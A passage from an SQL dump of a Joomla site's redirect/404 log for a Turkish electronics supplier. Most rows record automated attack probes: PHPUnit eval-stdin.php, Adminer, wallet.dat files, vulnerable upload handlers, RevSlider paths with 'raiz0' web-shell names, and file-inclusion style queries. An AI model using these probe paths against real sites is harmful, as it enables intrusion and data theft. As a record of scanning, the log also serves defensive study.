00:00:00',301),(22992,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',9,0,'2019-06-30 04:52:24','0000-00-00 00:00:00',301),(22993,'http://3s-technologies.com.tr/en/wp-content/plugins/mapbox/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/mapbox/readme.txt','',1,0,'2019-07-01 02:37:56','0000-00-00 00:00:00',301),(22994,'http://www.3s-technologies.com.tr/tr/yflxjlnkm.html',NULL,'','',1,0,'2019-07-02 03:00:46','0000-00-00 00:00:00',301),(22995,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_sku/results,1-20?language=tr-tr',NULL,'','',2,0,'2019-07-02 03:31:27','0000-00-00 00:00:00',301),(22996,'http://3s-technologies.com.tr/tr/rjlxtfxtmi.html',NULL,'','',1,0,'2019-07-03 20:15:41','0000-00-00 00:00:00',301),(22997,'http://3s-technologies.com.tr/tr/xxxxxx.php',NULL,'','',1,0,'2019-07-03 23:35:57','0000-00-00 00:00:00',301),(22998,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',81,0,'2019-07-03 23:36:02','0000-00-00 00:00:00',301),(22999,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/results,1-20',NULL,'','',3,0,'2019-07-04 06:25:31','0000-00-00 00:00:00',301),(23000,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',5,0,'2019-07-05 21:01:10','0000-00-00 00:00:00',301),(23001,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/by,product_sku?language=tr-tr',NULL,'','',10,0,'2019-07-05 21:29:30','0000-00-00 00:00:00',301),(23002,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/rh2-20-detail',NULL,'','',13,0,'2019-07-05 22:47:09','0000-00-00 00:00:00',301),(23003,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/phpunit.xsd',NULL,'','',14,0,'2019-07-05 23:47:41','0000-00-00 00:00:00',301),(23004,'http://3s-technologies.com.tr/tr/administrator/index.php;',NULL,'http://3s-technologies.com.tr/administrator/index.php;','',3,0,'2019-07-06 00:37:38','0000-00-00 00:00:00',301),(23005,'http://3s-technologies.com.tr/tr/?option=com_myblog&tmpl=component',NULL,'','',1,0,'2019-07-06 13:33:04','0000-00-00 00:00:00',301),(23006,'http://3s-technologies.com.tr/tr/?option=com_tag&controller=tag&tmpl=component&task=add',NULL,'','',1,0,'2019-07-06 13:33:06','0000-00-00 00:00:00',301),(23007,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2019-07-06 18:51:36','0000-00-00 00:00:00',301),(23008,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/by,product_sku/results,1-10?language=tr-tr',NULL,'','',4,0,'2019-07-08 20:48:32','0000-00-00 00:00:00',301),(23009,'http://www.3s-technologies.com.tr/tr/wordpress',NULL,'','',606,0,'2019-07-09 00:49:43','0000-00-00 00:00:00',301),(23010,'http://www.3s-technologies.com.tr/tr/wp',NULL,'','',601,0,'2019-07-09 00:49:44','0000-00-00 00:00:00',301),(23011,'http://www.3s-technologies.com.tr/tr/blog',NULL,'','',185,0,'2019-07-09 00:49:44','0000-00-00 00:00:00',301),(23012,'http://www.3s-technologies.com.tr/tr/new',NULL,'','',597,0,'2019-07-09 00:49:45','0000-00-00 00:00:00',301),(23013,'http://www.3s-technologies.com.tr/tr/old',NULL,'','',595,0,'2019-07-09 00:49:46','0000-00-00 00:00:00',301),(23014,'http://www.3s-technologies.com.tr/tr/test',NULL,'','',22,0,'2019-07-09 00:49:47','0000-00-00 00:00:00',301),(23015,'http://www.3s-technologies.com.tr/tr/main',NULL,'','',446,0,'2019-07-09 00:49:47','0000-00-00 00:00:00',301),(23016,'http://www.3s-technologies.com.tr/tr/site',NULL,'','',25,0,'2019-07-09 00:49:48','0000-00-00 00:00:00',301),(23017,'http://www.3s-technologies.com.tr/tr/backup',NULL,'','',594,0,'2019-07-09 00:49:50','0000-00-00 00:00:00',301),(23018,'http://www.3s-technologies.com.tr/tr/demo',NULL,'','',12,0,'2019-07-09 00:49:50','0000-00-00 00:00:00',301),(23019,'http://www.3s-technologies.com.tr/tr/home',NULL,'','',437,0,'2019-07-09 00:49:51','0000-00-00 00:00:00',301),(23020,'http://www.3s-technologies.com.tr/tr/cms',NULL,'','',23,0,'2019-07-09 00:49:51','0000-00-00 00:00:00',301),(23021,'http://www.3s-technologies.com.tr/tr/dev',NULL,'','',11,0,'2019-07-09 00:49:52','0000-00-00 00:00:00',301),(23022,'http://www.3s-technologies.com.tr/tr/portal',NULL,'','',13,0,'2019-07-09 00:49:53','0000-00-00 00:00:00',301),(23023,'http://www.3s-technologies.com.tr/tr/web',NULL,'','',23,0,'2019-07-09 00:49:53','0000-00-00 00:00:00',301),(23024,'http://www.3s-technologies.com.tr/tr/temp',NULL,'','',13,0,'2019-07-09 00:49:55','0000-00-00 00:00:00',301),(23025,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avf-detail',NULL,'','',3,0,'2019-07-12 10:47:10','0000-00-00 00:00:00',301),(23026,'http://www.3s-technologies.com.tr/tr/ybaufneh.html',NULL,'','',1,0,'2019-07-13 11:57:54','0000-00-00 00:00:00',301),(23027,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/results,1-50?language=tr-tr&filter_product=',NULL,'','',5,0,'2019-07-14 02:57:42','0000-00-00 00:00:00',301),(23028,'http://www.3s-technologies.com.tr/tr/&nx=205&ny=8&clkt=36&bg=!kpglkylemizhhvawub0caaabk1iaaabimqgjdcdoxa1o8scg5almw2mud2p1bolnvf03ebwbsn0nhi6jkkpzlydeqiwcf6sztv7az5ceb1hxyuxaacrflbwg-ybpcmoofxhl3k87ijeeyo0b-odb4o2syg-pjliwworzgmlhtoqgfqrijgfcz_xyq1tw7zmmd5pcb_sr0stz5gqzdsqalj-2dqvh_kguhfufewadqa5fus8edpuggugghlusrns81qfvshhuro1or2idg2v-jjede8k7hgrjaxgnr-qpndipzyj4ua1iwj3snavheicmisg-f2dadpwegfim3z9jmaudtpnwdd_frfldyugnexs1-42jxbf2mfu7wu7j9j10iufkoex0sezqcdgrnllxabnmb3sfzqpqsq_te1dlxjfrkmhpueoimzjtphnxvohukusaw4gv6_c0ag69b7buxucvbcuw4mo1pvli92g4ifddatd8bcky-notfed2nfeebuq-sv9t6kgka2ysrfsnvpy6qsqty3adg8lwftcii5tjhk1_',NULL,'https://www.google.com/','',1,0,'2019-07-14 14:44:01','0000-00-00 00:00:00',301),(23029,'http://3s-technologies.com.tr/en/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','',1,0,'2019-07-15 03:53:28','0000-00-00 00:00:00',301),(23030,'http://3s-technologies.com.tr/tr/gamzvzitygi.html',NULL,'','',2,0,'2019-07-15 21:37:49','0000-00-00 00:00:00',301),(23031,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/petx.gif',NULL,'','',1,0,'2019-07-15 23:34:14','0000-00-00 00:00:00',301),(23032,'http://3s-technologies.com.tr/en/wp-content/plugins/php-event-calendar/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/php-event-calendar/readme.txt','',1,0,'2019-07-16 02:22:20','0000-00-00 00:00:00',301),(23033,'http://3s-technologies.com.tr/tr/adminer.php',NULL,'','',86,0,'2019-07-16 12:06:55','0000-00-00 00:00:00',301),(23034,'http://3s-technologies.com.tr/tr/sql.php',NULL,'','',21,0,'2019-07-16 12:06:57','0000-00-00 00:00:00',301),(23035,'http://3s-technologies.com.tr/tr/phpminiadmin.php',NULL,'','',3,0,'2019-07-16 12:06:58','0000-00-00 00:00:00',301),(23036,'http://www.3s-technologies.com.tr/en/welcome.html',NULL,'','',5,0,'2019-07-16 20:58:27','0000-00-00 00:00:00',301),(23037,'http://3s-technologies.com.tr/tr//plugins/content/apismtp/apismtp.php?test=hello',NULL,'','',4,0,'2019-07-17 18:18:11','0000-00-00 00:00:00',301),(23038,'http://3s-technologies.com.tr/en/?option=com_phocaguestbook&id=1',NULL,'','',1,0,'2019-07-17 19:54:10','0000-00-00 00:00:00',301),(23039,'http://3s-technologies.com.tr/tr/wallet/wallet.dat',NULL,'','',9,0,'2019-07-20 06:06:18','0000-00-00 00:00:00',301),(23040,'http://3s-technologies.com.tr/tr/bitcoin/wallet.dat',NULL,'','',13,0,'2019-07-20 06:06:18','0000-00-00 00:00:00',301),(23041,'http://3s-technologies.com.tr/tr/v1',NULL,'','',7,0,'2019-07-20 23:52:34','0000-00-00 00:00:00',301),(23042,'http://3s-technologies.com.tr/tr/v2',NULL,'','',15,0,'2019-07-20 23:52:35','0000-00-00 00:00:00',301),(23043,'http://3s-technologies.com.tr/en/jm-ajax/upload_file',NULL,'http://3s-technologies.com.tr/jm-ajax/upload_file/','',2,0,'2019-07-23 11:27:21','0000-00-00 00:00:00',301),(23044,'http://www.3s-technologies.com.tr/en/jm-ajax/upload_file',NULL,'http://www.3s-technologies.com.tr/jm-ajax/upload_file/','',4,0,'2019-07-23 15:42:52','0000-00-00 00:00:00',301),(23045,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__qpnfw.php',NULL,'','',1,0,'2019-07-24 06:37:37','0000-00-00 00:00:00',301),(23046,'http://www.3s-technologies.com.tr/tr/wp-content/themes/avada/framework/plugins/revslider/temp/update_extract/revslider/vuln.php?c=vuln.php',NULL,'','',1,0,'2019-07-24 06:37:42','0000-00-00 00:00:00',301),(23047,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__qpnfw.php',NULL,'','',1,0,'2019-07-24 06:37:47','0000-00-00 00:00:00',301),(23048,'http://www.3s-technologies.com.tr/tr/components/raiz0worm_1563950124.php',NULL,'','',1,0,'2019-07-24 06:38:05','0000-00-00 00:00:00',301),(23049,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/assignments/raiz0_1563950124.php.',NULL,'','',1,0,'2019-07-24 06:38:09','0000-00-00 00:00:00',301),(23050,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/raiz0__qpnfw.php',NULL,'','',1,0,'2019-07-24 06:38:19','0000-00-00 00:00:00',301),(23051,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/dzs-videogallery/upload/xo.php',NULL,'','',1,0,'2019-07-24 06:38:24','0000-00-00 00:00:00',301),(23052,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'','',1,0,'2019-07-24 06:38:26','0000-00-00 00:00:00',301),(23053,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/levoslideshow/42_uploadfolder/big/raiz0__qpnfw.php',NULL,'','',1,0,'2019-07-24 06:38:33','0000-00-00 00:00:00',301),(23054,'http://www.3s-technologies.com.tr/tr/wp-content/themes/clockstone/theme/functions/u3p.php',NULL,'','',1,0,'2019-07-24 06:38:40','0000-00-00 00:00:00',301),(23055,'http://3s-technologies.com.tr/tr/media/x.txt',NULL,'','',8,0,'2019-07-24 12:51:40','0000-00-00 00:00:00',301),(23056,'http://3s-technologies.com.tr/tr/images/image.gif',NULL,'','',9,0,'2019-07-24 12:51:44','0000-00-00 00:00:00',301),(23057,'http://3s-technologies.com.tr/en/wp-content/plugins/sexy-contact-form/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/sexy-contact-form/readme.txt','',1,0,'2019-07-25 08:17:37','0000-00-00 00:00:00',301),(23058,'http://www.3s-technologies.com.tr/en/wp-content/plugins/sexy-contact-form/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/sexy-contact-form/readme.txt','',2,0,'2019-07-25 12:14:46','0000-00-00 00:00:00',301),(23059,'http://www.3s-technologies.com.tr/tr/nueichcwdmitnpnj.html',NULL,'','',1,0,'2019-07-26 05:46:51','0000-00-00 00:00:00',301),(23060,'http://3s-technologies.com.tr/tr/wp-content/plugins/ad-inserter/readme.txt',NULL,'','',1,0,'2019-07-26 06:14:40','0000-00-00 00:00:00',301),(23061,'http://3s-technologies.com.tr/en/profile/upload/server/php',NULL,'http://3s-technologies.com.tr/profile/upload/server/php/','',1,0,'2019-07-26 08:44:56','0000-00-00 00:00:00',301),(23062,'http://www.3s-technologies.com.tr/en/profile/upload/server/php',NULL,'http://www.3s-technologies.com.tr/profile/upload/server/php/','',2,0,'2019-07-26 12:53:24','0000-00-00 00:00:00',301),(23063,'http://3s-technologies.com.tr/tr/aaunwymxqzcc.html',NULL,'','',1,0,'2019-07-27 06:17:20','0000-00-00 00:00:00',301),(23064,'http://3s-technologies.com.tr/en/wp-content/plugins/console_contact_form/upload_file.php?files',NULL,'http://3s-technologies.com.tr/wp-content/plugins/console_contact_form/upload_file.php?files','',1,0,'2019-07-27 07:43:11','0000-00-00 00:00:00',301),(23065,'http://www.3s-technologies.com.tr/en/wp-content/plugins/console_contact_form/upload_file.php?files',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/console_contact_form/upload_file.php?files','',2,0,'2019-07-27 11:24:11','0000-00-00 00:00:00',301),(23066,'http://3s-technologies.com.tr/en/wp-content/plugins/1-flash-gallery/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/1-flash-gallery/readme.txt','',1,0,'2019-07-29 04:35:13','0000-00-00 00:00:00',301),(23067,'http://www.3s-technologies.com.tr/en/wp-content/plugins/1-flash-gallery/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/1-flash-gallery/readme.txt','',2,0,'2019-07-29 11:31:40','0000-00-00 00:00:00',301),(23068,'http://www.3s-technologies.com.tr/tr/changelog.txt',NULL,'','',6,0,'2019-07-29 13:29:50','0000-00-00 00:00:00',301),(23069,'http://3s-technologies.com.tr/tr/forum/index',NULL,'','',1,0,'2019-07-29 19:33:14','0000-00-00 00:00:00',301),(23070,'http://3s-technologies.com.tr/tr//js/calendar/cfd.php',NULL,'','',1,0,'2019-07-29 22:17:28','0000-00-00 00:00:00',301),(23071,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','',1,0,'2019-07-30 11:38:32','0000-00-00 00:00:00',301),(23072,'http://3s-technologies.com.tr/en/wp-content/themes/clockstone/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/clockstone/style.css','',1,0,'2019-07-31 10:57:59','0000-00-00 00:00:00',301),(23073,'http://www.3s-technologies.com.tr/en/wp-content/themes/clockstone/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/clockstone/style.css','',2,0,'2019-07-31 14:47:51','0000-00-00 00:00:00',301),(23074,'http://3s-technologies.com.tr/en/modules/filesupload/upload.php',NULL,'http://3s-technologies.com.tr/modules/filesupload/upload.php','',1,0,'2019-08-02 01:06:47','0000-00-00 00:00:00',301),(23075,'http://www.3s-technologies.com.tr/en/modules/filesupload/upload.php',NULL,'http://www.3s-technologies.com.tr/modules/filesupload/upload.php','',2,0,'2019-08-02 04:52:26','0000-00-00 00:00:00',301),(23076,'http://www.3s-technologies.com.tr/tr/eoorncihxtfmpg.html',NULL,'','',1,0,'2019-08-02 07:11:33','0000-00-00 00:00:00',301),(23077,'http://3s-technologies.com.tr/en/wp-content/themes/rockstar-theme/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/rockstar-theme/style.css','',1,0,'2019-08-03 00:51:41','0000-00-00 00:00:00',301),(23078,'http://3s-technologies.com.tr/tr/tfuchohbvohenrip.html',NULL,'','',1,0,'2019-08-03 07:01:34','0000-00-00 00:00:00',301),(23079,'http://3s-technologies.com.tr/tr/wp/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:02:11','0000-00-00 00:00:00',301),(23080,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:02:14','0000-00-00 00:00:00',301),(23081,'http://3s-technologies.com.tr/tr/test/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:03:40','0000-00-00 00:00:00',301),(23082,'http://3s-technologies.com.tr/tr/new/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2019-08-04 11:04:21','0000-00-00 00:00:00',301),(23083,'http://3s-technologies.com.tr/en/wp-includes/wlwmanifest.xml',NULL,'','',10,0,'2019-08-04 11:04:46','0000-00-00 00:00:00',301),(23084,'http://3s-technologies.com.tr/tr/demo/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:06:01','0000-00-00 00:00:00',301),(23085,'http://3s-technologies.com.tr/tr/web/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:06:17','0000-00-00 00:00:00',301),(23086,'http://3s-technologies.com.tr/tr/dev/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:07:25','0000-00-00 00:00:00',301),(23087,'http://3s-technologies.com.tr/tr/home/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:07:41','0000-00-00 00:00:00',301),(23088,'http://3s-technologies.com.tr/tr/www/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:08:29','0000-00-00 00:00:00',301),(23089,'http://3s-technologies.com.tr/tr/staging/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:08:45','0000-00-00 00:00:00',301),(23090,'http://3s-technologies.com.tr/tr/news/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:10:14','0000-00-00 00:00:00',301),(23091,'http://3s-technologies.com.tr/tr/shop/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:10:29','0000-00-00 00:00:00',301),(23092,'http://3s-technologies.com.tr/tr/newsite/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:11:27','0000-00-00 00:00:00',301),(23093,'http://3s-technologies.com.tr/tr/v2/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2019-08-04 11:12:07','0000-00-00 00:00:00',301),(23094,'http://3s-technologies.com.tr/tr/website/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:13:42','0000-00-00 00:00:00',301),(23095,'http://3s-technologies.com.tr/tr/portal/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:13:57','0000-00-00 00:00:00',301),(23096,'http://3s-technologies.com.tr/tr/2018/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:14:15','0000-00-00 00:00:00',301),(23097,'http://3s-technologies.com.tr/tr/2019/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:14:31','0000-00-00 00:00:00',301),(23098,'http://3s-technologies.com.tr/tr/1/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:15:07','0000-00-00 00:00:00',301),(23099,'http://3s-technologies.com.tr/tr/store/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2019-08-04 11:15:28','0000-00-00 00:00:00',301),(23100,'http://3s-technologies.com.tr/tr/wp2/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2019-08-04 11:15:44','0000-00-00 00:00:00',301),(23101,'http://www.3s-technologies.com.tr/en/templates/jtemplate/index.html',NULL,'http://www.3s-technologies.com.tr/templates/jtemplate/index.html','',1,0,'2019-08-04 15:15:24','0000-00-00 00:00:00',301),(23102,'http://3s-technologies.com.tr/en/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','',1,0,'2019-08-05 02:08:11','0000-00-00 00:00:00',301),(23103,'http://www.3s-technologies.com.tr/en/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','',2,0,'2019-08-05 05:56:45','0000-00-00 00:00:00',301),(23104,'http://3s-technologies.com.tr/en/wp-content/themes/purevision/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/purevision/style.css','',1,0,'2019-08-06 01:38:37','0000-00-00 00:00:00',301),(23105,'http://3s-technologies.com.tr/tr/plugins/system/cache/plugins.php',NULL,'','',1,0,'2019-08-06 03:05:49','0000-00-00 00:00:00',301),(23106,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/results,1-20',NULL,'','',2,0,'2019-08-06 15:18:05','0000-00-00 00:00:00',301),(23107,'http://3s-technologies.com.tr/en/cgi-bin/feal.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:36:16','0000-00-00 00:00:00',301),(23108,'http://3s-technologies.com.tr/en/cgi-bin/newsslide.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:36:29','0000-00-00 00:00:00',301),(23109,'http://3s-technologies.com.tr/en/newsslide.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:36:48','0000-00-00 00:00:00',301),(23110,'http://3s-technologies.com.tr/en/css/newsslide.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:37:12','0000-00-00 00:00:00',301),(23111,'http://3s-technologies.com.tr/en/cgi-bin/cgi-bin1.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:37:30','0000-00-00 00:00:00',301),(23112,'http://3s-technologies.com.tr/en/php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:37:39','0000-00-00 00:00:00',301),(23113,'http://3s-technologies.com.tr/en/cgi-bin/cgi-bin.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:37:41','0000-00-00 00:00:00',301),(23114,'http://3s-technologies.com.tr/en/js/newsslide.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:02','0000-00-00 00:00:00',301),(23115,'http://3s-technologies.com.tr/en/images/images.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:06','0000-00-00 00:00:00',301),(23116,'http://3s-technologies.com.tr/en/cgi-bin/newsrsss.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:09','0000-00-00 00:00:00',301),(23117,'http://3s-technologies.com.tr/en/newsrsss.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:09','0000-00-00 00:00:00',301),(23118,'http://3s-technologies.com.tr/en/cgi-bin/feal11.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:18','0000-00-00 00:00:00',301),(23119,'http://3s-technologies.com.tr/en/images/feal.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:24','0000-00-00 00:00:00',301),(23120,'http://3s-technologies.com.tr/en/images/newsslide.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:25','0000-00-00 00:00:00',301),(23121,'http://3s-technologies.com.tr/en/css/css.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:31','0000-00-00 00:00:00',301),(23122,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/acme-challenge.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:34','0000-00-00 00:00:00',301),(23123,'http://3s-technologies.com.tr/en/ample.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:35','0000-00-00 00:00:00',301),(23124,'http://3s-technologies.com.tr/en/js/feal.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:38:41','0000-00-00 00:00:00',301),(23125,'http://3s-technologies.com.tr/en/fonts/fonts.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:39:05','0000-00-00 00:00:00',301),(23126,'http://3s-technologies.com.tr/en/ple.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:39:07','0000-00-00 00:00:00',301),(23127,'http://3s-technologies.com.tr/en/name=htp:/example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:39:12','0000-00-00 00:00:00',301),(23128,'http://3s-technologies.com.tr/en/css/feal.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:39:55','0000-00-00 00:00:00',301),(23129,'http://3s-technologies.com.tr/en/images/newsrsss.php?name=htp://example.com&file=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:40:58','0000-00-00 00:00:00',301),(23130,'http://3s-technologies.com.tr/en/ile=test.txt',NULL,'3s-technologies.com.tr','',1,0,'2019-08-08 06:41:05','0000-00-00 00:00:00',301),(23131,'http://www.3s-technologies.com.tr/tr/elvsjunoih.html',NULL,'','',1,0,'2019-08-11 01:53:48','0000-00-00 00:00:00',301),(23132,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/en/products-en/user/',NULL,'http://www.3s-technologies.com.tr/en/products-en/user/','',2,0,'2019-08-11 16:57:42','0000-00-00 00:00:00',301),(23133,'http://3s-technologies.com.tr/tr/nrdcrntbjqf.html',NULL,'','',1,0,'2019-08-12 01:43:50','0000-00-00 00:00:00',301),(23134,'http://3s-technologies.com.tr/tr//modules/mod_joomlaapi/apisystem.php',NULL,'','',1,0,'2019-08-17 09:09:41','0000-00-00 00:00:00',301),(23135,'http://3s-technologies.com.tr/tr//modules/mod_googlemapsapi/fm.php',NULL,'','',1,0,'2019-08-17 09:09:42','0000-00-00 00:00:00',301),(23136,'http://3s-technologies.com.tr/tr//administrator/dbapi.php',NULL,'','',1,0,'2019-08-17 09:09:42','0000-00-00 00:00:00',301),(23137,'http://3s-technologies.com.tr/tr//modules/mod_mapsgoogle/fm.php',NULL,'','',1,0,'2019-08-17 09:09:43','0000-00-00 00:00:00',301),(23138,'http://3s-technologies.com.tr/tr//libraries/joomla/application/component/view-base64.php',NULL,'','',1,0,'2019-08-17 09:09:44','0000-00-00 00:00:00',301),(23139,'http://3s-technologies.com.tr/tr//l82uoct.php',NULL,'','',1,0,'2019-08-17 09:09:44','0000-00-00 00:00:00',301),(23140,'http://3s-technologies.com.tr/tr//fs.php',NULL,'','',1,0,'2019-08-17 09:09:45','0000-00-00 00:00:00',301),(23141,'http://www.3s-technologies.com.tr/tr/nlnktwlhzxztfsrg.html',NULL,'','',1,0,'2019-08-18 01:06:41','0000-00-00 00:00:00',301),(23142,'http://3s-technologies.com.tr/tr/ixbqvuhkgfdct.html',NULL,'','',1,0,'2019-08-19 00:43:05','0000-00-00 00:00:00',301),(23143,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,1-5',NULL,'','',3,0,'2019-08-19 01:06:08','0000-00-00 00:00:00',301),(23144,'http://3s-technologies.com.tr/en/update.php',NULL,'','',4,0,'2019-08-20 05:27:01','0000-00-00 00:00:00',301),(23145,'http://3s-technologies.com.tr/tr/administrator/components/com_simpleswfupload/uploadhandler.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_simpleswfupload/uploadhandler.php','',6,0,'2019-08-21 04:37:34','0000-00-00 00:00:00',301),(23146,'http://3s-technologies.com.tr/tr/administrator/components/com_simpleswfupload/uploadhandler.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_simpleswfupload/uploadhandler.php','',1,0,'2019-08-21 04:37:34','0000-00-00 00:00:00',301),(23147,'http://3s-technologies.com.tr/tr/swagger-ui.html',NULL,'','',1,0,'2019-08-21 08:10:35','0000-00-00 00:00:00',301),(23148,'http://3s-technologies.com.tr/tr/swagger-resources',NULL,'','',1,0,'2019-08-21 08:10:36','0000-00-00 00:00:00',301),(23149,'https://3s-technologies.com.tr/tr/swagger-ui.html',NULL,'','',2,0,'2019-08-21 08:10:36','0000-00-00 00:00:00',301),(23150,'http://3s-technologies.com.tr/tr/swagger/v1/swagger.json',NULL,'','',1,0,'2019-08-21 08:10:36','0000-00-00 00:00:00',301),(23151,'https://3s-technologies.com.tr/tr/swagger-resources',NULL,'','',1,0,'2019-08-21 08:10:37','0000-00-00 00:00:00',301),(23152,'http://3s-technologies.com.tr/tr/api',NULL,'','',2,0,'2019-08-21 08:10:37','0000-00-00 00:00:00',301),(23153,'http://3s-technologies.com.tr/tr/swagger/index.html',NULL,'','',1,0,'2019-08-21 08:10:38','0000-00-00 00:00:00',301),(23154,'https://3s-technologies.com.tr/tr/swagger/v1/swagger.json',NULL,'','',1,0,'2019-08-21 08:10:38','0000-00-00 00:00:00',301),(23155,'http://3s-technologies.com.tr/tr/dana-na/auth/url_default/welcome.cgi',NULL,'','',1,0,'2019-08-21 